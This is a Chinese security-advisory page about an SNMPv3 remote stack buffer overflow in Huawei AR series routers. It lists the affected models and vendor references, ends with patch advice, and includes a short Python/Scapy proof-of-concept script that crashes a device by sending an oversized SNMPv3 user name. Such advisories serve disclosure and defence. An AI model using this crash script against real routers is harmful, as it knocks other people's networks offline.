首页 / 操作系统 / Linux / Huawei AR 系列路由器 SNMPv3 远程栈缓冲区溢出漏洞
发布日期:2013-03-13 更新日期:2013-05-07受影响系统: Huawei AR Series Routers 3200 Huawei AR Series Routers 2200 Huawei AR Series Routers 200 Huawei AR Series Routers 150 Huawei AR Series Routers 1200 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 59662
链接:http://www.osvdb.org/show/osvdb/92935 http://blog.emaze.net/2013/05/multiple-buffer-overflows-on-huawei.html http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-260601.htm http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-260626.htm *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! Roberto Paleari (roberto.paleari@emaze.net)提供了如下测试方法: This Python example crashes the device by overflowing the "UserName" SNMPv3 USM field. Consider we used a slightly modified version of Python Scapy library to properly support the SNMPv3 protocol. The complete Python script and the modified Scapy library can be provided upon request. <cut> from scapy.all import * def main(): DST = "192.168.1.1" snmp = SNMPv3(version=3) pkt = IP(dst=DST)/UDP(sport=RandShort(), dport=161)/snmp pkt = snmpsetauth(pkt, "emaze", "MD5") pkt["SNMPv3"].flags = 4 # Replace "user_name" with "auth_engine_id" in the next line to trigger the # other overflow pkt["SNMPv3"].security.user_name = "A"*4096 pkt.show() send(pkt) if __name__ == "__main__": main() </cut>建议: -------------------------------------------------------------------------------- 厂商补丁:
Huawei ------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.huawei.com/en/products/data-communication/ar-routers/Apache VCL多个输入验证漏洞Cisco Wireless LAN Controller Telnet 远程拒绝服务漏洞(CVE-2013-1235)相关资讯 Huawei AR路由器安全漏洞